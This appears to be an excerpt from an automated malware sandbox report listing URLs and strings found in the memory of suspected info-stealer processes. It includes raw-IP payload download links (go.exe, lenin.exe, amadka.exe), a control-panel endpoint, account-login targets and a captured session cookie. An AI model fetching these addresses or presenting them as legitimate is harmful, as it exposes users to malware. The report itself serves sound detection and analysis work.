Source: MPGPH131.exe, 0000001C.00000003.3043589855.0000000007CB2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3032607881.0000000007CC7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3047846067.0000000007DD1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Khttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 0000001D.00000003.3039143770.00000000079EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARZ0qKJqaiC2kMEiuCgpI4CDA9zdQR9Ma_4VO4V4SsWE5FBoZnSBBlUHdjOISz2jXF92hxTK-U9yBg equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 0000001D.00000003.3039143770.00000000079EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 0000001D.00000003.3039143770.00000000079EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=ARZ0qKLYPILSqGGJxF99XUM7ry_ZpWfAteaIP49LuGs_pX6vyTY-I4NhOGVeIl3pV2a7zJNZmB6a&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-284379341%3A1713490158071679&theme=mn&ddm=0 equals www.youtube.com (Youtube)
Source: 831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3237599781.0000000003FB4000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3207722657.0000000003FB4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: 831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account7 equals www.youtube.com (Youtube)
Source: 831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountA equals www.youtube.com (Youtube)
Source: 831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountJ equals www.youtube.com (Youtube)
Source: 831840b410.exe, 00000010.00000003.3086222866.0000000003789000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3110190311.00000000037C9000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3087346454.00000000037C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountL equals www.youtube.com (Youtube)
Source: 831840b410.exe, 0000001F.00000002.3242965392.0000000004034000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3235541239.0000000004034000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountM) equals www.youtube.com (Youtube)
Source: 831840b410.exe, 0000001F.00000002.3242965392.0000000004034000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3235541239.0000000004034000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountT) equals www.youtube.com (Youtube)
Source: 831840b410.exe, 0000002F.00000003.3477995978.00000000040EE000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000002F.00000003.3475843478.00000000040CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account[C equals www.youtube.com (Youtube)
Source: 831840b410.exe, 0000001F.00000002.3242965392.0000000004034000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3235541239.0000000004034000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountd* equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: www.youtube.com
Source: unknown HTTP traffic detected: POST /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 927sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"Content-Type: text/plain;charset=UTF-8sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"X-Goog-AuthUser: 0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Origin: https://accounts.google.comX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=513=DL6Us8jAPrwCCKarlTw2RsBHsg-PZZE0_IVMLOmld8Vg4EMZhTyE_65f9B0OK-p44_4Uk-puC2a1J_sCfoJnyAtSeJNyRbiKB8AiKkQJAbADm2J1hujbY6LjrFBfHJLMH2_5Lm7sfqr7tbq8PbRvtYkxosEGP0PKBUVLfjHGngA
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.47.102:57893/hera/amadka.exe
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/go.exe
Source: MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/go.exe0.1
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/go.exeero
Source: MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/go.exerisepro
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/lenin.exe
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/lenin.exe.eR
Source: MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/lenin.exe/
Source: rundll32.exe, 00000008.00000002.2871819933.000001E17AF1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php
Source: rundll32.exe, 00000008.00000002.2874206472.000001E17CD57000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2871819933.000001E17AE8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1
Source: rundll32.exe, 00000008.00000002.2874206472.000001E17CD57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1E
Source: rundll32.exe, 00000008.00000002.2874206472.000001E17CD57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1ame=
Source: rundll32.exe, 00000008.00000002.2874206472.000001E17CD57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/esI
Source: powershell.exe, 0000000B.00000002.2810399931.0000029EFCB80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: svchost.exe, 00000012.00000003.7080004981.0000014EABA8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000012.00000003.7080004981.0000014EABA63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.3611100512.0000014EAB782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dvwmczhfksazn5mwlykzsdqv6u_2024.3.27.0/go
Source: svchost.exe, 00000012.00000003.7080004981.0000014EABA63000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/release2/chrome_component/dvwmczhfksazn5mwlykzsdqv6u_2024.3.27.0
Source: svchost.exe, 00000012.00000003.2839947296.0000014EAB780000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 0000000B.00000002.2803800897.0000029E9006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2784637428.0000029E819C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.2784637428.0000029E80228000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000B.00000002.2784637428.0000029E80228000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000B.00000002.2784637428.0000029E80001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000B.00000002.2784637428.0000029E80228000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.2784637428.0000029E80228000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: c884f8452a.exe, 00000014.00000003.2883884113.0000000005380000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000002.3269708121.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 0000001C.00000003.2928548272.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3244160511.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000002.3252023529.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000003.2928357410.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000003.3049065543.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3145142996.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, RageMP131.exe, 0000002D.00000003.3127053365.0000000005330000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3204405230.0000000000371000.00000040.00000001.01000000.00000017.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: c884f8452a.exe, 00000014.00000002.3269708121.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 0000001C.00000002.3244160511.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000002.3252023529.0000000000891000.00000040.00000001.01000000.00000015.sdmp, c884f8452a.exe, 00000024.00000002.3145142996.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: http://www.winimage.com/zLibDllDp
Source: RageMP131.exe, 0000002D.00000002.3204405230.0000000000371000.00000040.00000001.01000000.00000017.sdmp String found in binary or memory: http://www.winimage.com/zLibDllDpITpI
Source: c884f8452a.exe, 00000014.00000003.2883884113.0000000005380000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.2928548272.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.2928357410.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000003.3049065543.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000003.3127053365.0000000005330000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.winimage.com/zLibDllDpRTpR
Source: c884f8452a.exe, 00000014.00000003.2968476956.0000000008136000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2963987119.0000000008128000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2975509031.0000000007F5C000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3029768103.0000000007CC3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3036519526.0000000007D01000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3046918349.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3052160473.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3038281915.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3042483731.000000000797B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MPGPH131.exe, 0000001C.00000003.3043589855.0000000007CB2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3032607881.0000000007CC7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3047846067.0000000007DD1000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3039143770.00000000079EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_s
Source: MPGPH131.exe, 0000001C.00000003.3043589855.0000000007CB2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3032607881.0000000007CC7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3047846067.0000000007DD1000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3039143770.00000000079EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2
Source: MPGPH131.exe, 0000001C.00000003.3043589855.0000000007CB2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3032607881.0000000007CC7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3047846067.0000000007DD1000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3039143770.00000000079EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fa
Source: powershell.exe, 0000000B.00000002.2784637428.0000029E80001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000B.00000002.2784637428.0000029E80228000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000000B.00000002.2784637428.0000029E81633000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: c884f8452a.exe, 00000014.00000003.2968476956.0000000008136000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2963987119.0000000008128000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2975509031.0000000007F5C000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3029768103.0000000007CC3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3036519526.0000000007D01000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3046918349.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3052160473.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3038281915.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3042483731.000000000797B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: c884f8452a.exe, 00000014.00000003.2968476956.0000000008136000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2963987119.0000000008128000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2975509031.0000000007F5C000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3029768103.0000000007CC3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3036519526.0000000007D01000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3046918349.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3052160473.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3038281915.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3042483731.000000000797B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: c884f8452a.exe, 00000014.00000003.2968476956.0000000008136000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2963987119.0000000008128000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2975509031.0000000007F5C000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3029768103.0000000007CC3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3036519526.0000000007D01000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3046918349.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3052160473.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3038281915.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3042483731.000000000797B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 0000000B.00000002.2784637428.0000029E819C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2784637428.0000029E819C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2784637428.0000029E819C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/
Source: RageMP131.exe, 0000002D.00000002.3206727588.000000000181D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/J
Source: c884f8452a.exe, 00000024.00000002.3143187486.000000000060A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/K
Source: c884f8452a.exe, 00000024.00000002.3143187486.000000000060A000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3206727588.000000000181D000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3215370916.0000000007EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.57.52
Source: RageMP131.exe, 0000002D.00000002.3206727588.000000000181D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.57.52-
Source: c884f8452a.exe, 00000014.00000002.3279923051.0000000007ED6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.57.52?q
Source: MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.57.52r
Source: RageMP131.exe, 0000002D.00000002.3206727588.000000000181D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/r
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3143187486.000000000058D000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3206727588.000000000181D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com:443/demo/home.php?s=81.181.57.52
Source: c884f8452a.exe, 00000014.00000003.2968476956.0000000008136000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2963987119.0000000008128000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2975509031.0000000007F5C000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3029768103.0000000007CC3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3036519526.0000000007D01000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3046918349.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3052160473.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3038281915.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3042483731.000000000797B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: c884f8452a.exe, 00000014.00000003.2968476956.0000000008136000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2963987119.0000000008128000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2975509031.0000000007F5C000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3029768103.0000000007CC3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3036519526.0000000007D01000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3046918349.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3052160473.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3038281915.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3042483731.000000000797B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: c884f8452a.exe, 00000014.00000003.2968476956.0000000008136000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2963987119.0000000008128000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2975509031.0000000007F5C000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3029768103.0000000007CC3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3036519526.0000000007D01000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3046918349.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3052160473.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3038281915.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3042483731.000000000797B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000012.00000003.2839947296.0000014EAB7F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000012.00000003.2839947296.0000014EAB780000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 0000000B.00000002.2784637428.0000029E80228000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: RageMP131.exe, 0000002D.00000002.3206727588.00000000017AE000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3206727588.000000000181D000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3206727588.000000000179F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3143187486.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3206727588.00000000017FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: c884f8452a.exe, 00000014.00000003.2883884113.0000000005380000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000002.3269708121.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 0000001C.00000003.2928548272.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3244160511.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000002.3252023529.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000003.2928357410.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000003.3049065543.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3145142996.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, RageMP131.exe, 0000002D.00000003.3127053365.0000000005330000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3204405230.0000000000371000.00000040.00000001.01000000.00000017.sdmp String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
Source: MPGPH131.exe, 0000001D.00000002.3253650821.000000000125C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/t
